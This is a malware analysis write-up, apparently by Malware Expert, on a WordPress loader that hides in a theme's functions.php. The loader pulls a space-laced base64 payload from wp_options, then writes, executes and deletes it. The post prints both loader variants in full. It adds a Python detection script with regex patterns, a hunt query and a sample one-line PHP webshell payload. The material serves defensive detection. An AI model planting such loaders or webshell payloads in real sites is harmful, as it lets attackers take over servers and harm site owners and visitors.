This malware is fairly clever: it stores its payload inside the WordPress database and keeps only a small loader in the active theme's functions.php file. The attacker, or a botnet, can send POST data at any time to update the stored payload or add a new one to the database.
Each time the loader runs it fetches the payload from the database, writes it into a PHP script, includes (executes) that script, and as its last command unlinks the script again, so the dropped file is on disk only for a moment.
The loader itself hides inside the theme's functions.php file.
Functions.php
Data inside database
The payload is stored base64-encoded in the wp_options table, where it is hard to spot among a site's many legitimate options.
On top of that, the base64 text has spaces inserted into it, so as stored it is not valid base64 and does not match a naive base64 signature; the loader removes the spaces with str_replace(" ","",$data) before decoding:
We found two versions of this malware, differing in the option name under which the encoded data is stored in the database:
function-sync.php
// Pull the database credentials and table prefix from the site's own wp-config.php
include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
$conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Fetch the base64 payload stored under option_name 'function-sync'
$sql = "SELECT * FROM ".$table_prefix."options where option_name='function-sync'";
$result = mysqli_query($conn, $sql);
while($row = mysqli_fetch_assoc($result)) { $data = $row['option_value']; }
// Strip the spaces laced into the base64, decode it, and drop the result as a PHP file
chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
file_put_contents("/home/malware.expert/public_html/wp-temporary.php", base64_decode(str_replace(" ","",$data)));
// Execute the dropped file, then delete it again so it is not left on disk
include "/home/malware.expert/public_html"."/wp-temporary.php";
unlink("/home/malware.expert/public_html"."/wp-temporary.php");
content-wp-reload.php
// Identical to the first version except for the option name it reads
include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
$conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Fetch the base64 payload stored under option_name 'content-wp-reload'
$sql = "SELECT * FROM ".$table_prefix."options where option_name='content-wp-reload'";
$result = mysqli_query($conn, $sql);
while($row = mysqli_fetch_assoc($result)) { $data = $row['option_value']; }
// Strip the spaces laced into the base64, decode it, and drop the result as a PHP file
chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
file_put_contents("/home/malware.expert/public_html/wp-temporary.php", base64_decode(str_replace(" ","",$data)));
// Execute the dropped file, then delete it again
include "/home/malware.expert/public_html"."/wp-temporary.php";
unlink("/home/malware.expert/public_html"."/wp-temporary.php");
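The two loaders above show everything a responder needs to hunt for this family: the fetch/write/include/unlink chain in functions.php, and option rows whose value becomes PHP once the spaces are stripped out. The script below is an added triage example written for this post, not code from the page or from Malware Expert. The sample functions.php, the sample wp_options rows, the /var/www/html path and the dropped-file payload are constructed for the demo; the only names taken from the page are the option names function-sync and content-wp-reload, and the wp_ table prefix is an assumption to be read from the site's wp-config.php.

```python
"""Triage helpers for the functions.php / wp_options loader described above.

Added example, not code from the page or from malware.expert. Sample inputs
are constructed; paths and the table prefix are assumptions.
"""
import base64
import binascii
import re

# Every regex must match for a file to count as the loader: each stage alone
# (file_put_contents, include, unlink) is common in legitimate theme code.
LOADER_MARKERS = (
    r"option_name\s*=\s*'",                                    # reads a wp_options row
    r'base64_decode\s*\(\s*str_replace\s*\(\s*"\s"\s*,\s*""',  # strips spaces, then decodes
    r"file_put_contents\s*\(",                                 # writes the dropped PHP file
    r"\binclude\b",                                            # executes it
    r"\bunlink\s*\(",                                          # deletes it again
)

# Strings that mark a decoded option value as PHP rather than serialized data.
PHP_MARKERS = (b"<?php", b"eval(", b"base64_decode(", b"$_POST", b"$_REQUEST", b"$_GET")


def find_loader(php_source: str) -> bool:
    """True when all stages of the fetch/write/include/unlink chain are present."""
    return all(re.search(marker, php_source) for marker in LOADER_MARKERS)


def decode_spaced_base64(value: str):
    """Undo the evasion used here: whitespace laced into the base64 so the stored
    text is neither valid base64 nor greppable as PHP. Returns bytes or None."""
    stripped = re.sub(r"\s+", "", value)
    try:
        return base64.b64decode(stripped, validate=True)
    except (binascii.Error, ValueError):
        return None


def suspicious_options(rows):
    """Return [(option_name, had_spaces, decoded_preview)] for rows that decode to PHP.
    `rows` is an iterable of (option_name, option_value) as dumped from wp_options."""
    findings = []
    for name, value in rows:
        decoded = decode_spaced_base64(value)
        if decoded is not None and any(m in decoded for m in PHP_MARKERS):
            findings.append((name, " " in value, decoded[:40]))
    return findings


def hunt_query(table_prefix: str = "wp_") -> str:
    """MySQL query for a live site: strip spaces in SQL, then match base64 of '<?php'.
    Assumes the standard wp_options layout; take the prefix from wp-config.php."""
    prefix = base64.b64encode(b"<?php").decode()[:7]  # 'PD9waHA'
    return (f"SELECT option_id, option_name, LENGTH(option_value) AS len "
            f"FROM {table_prefix}options "
            f"WHERE REPLACE(option_value, ' ', '') LIKE '{prefix}%';")


def lace_with_spaces(text: str, every: int = 7) -> str:
    """Reproduce the storage format seen in the database: spaces inside the base64."""
    return " ".join(text[i:i + every] for i in range(0, len(text), every))


# --- constructed samples (not from any real site) -------------------------
SAMPLE_FUNCTIONS_PHP = r'''<?php
add_action('init', 'theme_setup');  // legitimate theme code
include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
$conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
$sql = "SELECT * FROM ".$table_prefix."options where option_name='function-sync'";
$result = mysqli_query($conn, $sql);
while($row = mysqli_fetch_assoc($result)) { $data = $row['option_value']; }
file_put_contents("/var/www/html/wp-temporary.php", base64_decode(str_replace(" ","",$data)));
include "/var/www/html/wp-temporary.php";
unlink("/var/www/html/wp-temporary.php");
'''
CLEAN_FUNCTIONS_PHP = "<?php\nadd_action('init', 'theme_setup');\n"

PAYLOAD = b'<?php eval(base64_decode($_POST["c"])); ?>'  # stand-in for the dropped file
SAMPLE_ROWS = [
    ("siteurl", "https://example.com"),                                   # not base64
    ("function-sync", lace_with_spaces(base64.b64encode(PAYLOAD).decode())),
    ("content-wp-reload", base64.b64encode(PAYLOAD).decode()),            # no spaces
    ("theme_mods", base64.b64encode(b'a:1:{s:4:"logo";i:12;}').decode()),  # base64, not PHP
]

if __name__ == "__main__":
    print("loader in functions.php:", find_loader(SAMPLE_FUNCTIONS_PHP))
    for name, had_spaces, preview in suspicious_options(SAMPLE_ROWS):
        print(f"{name}: spaces={had_spaces} decoded={preview!r}")
    print(hunt_query())
```

Requiring all five loader stages keeps false positives down on themes that legitimately write or include files, and decoding after stripping all whitespace rather than only spaces catches variants that use tabs or newlines for the same trick. The SQL in hunt_query only finds payloads that begin with `<?php`; a payload with a leading comment or BOM would need the option dump run through suspicious_options instead.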
Malware Expert Signature
Our FREE Malware Expert Signatures found this malware.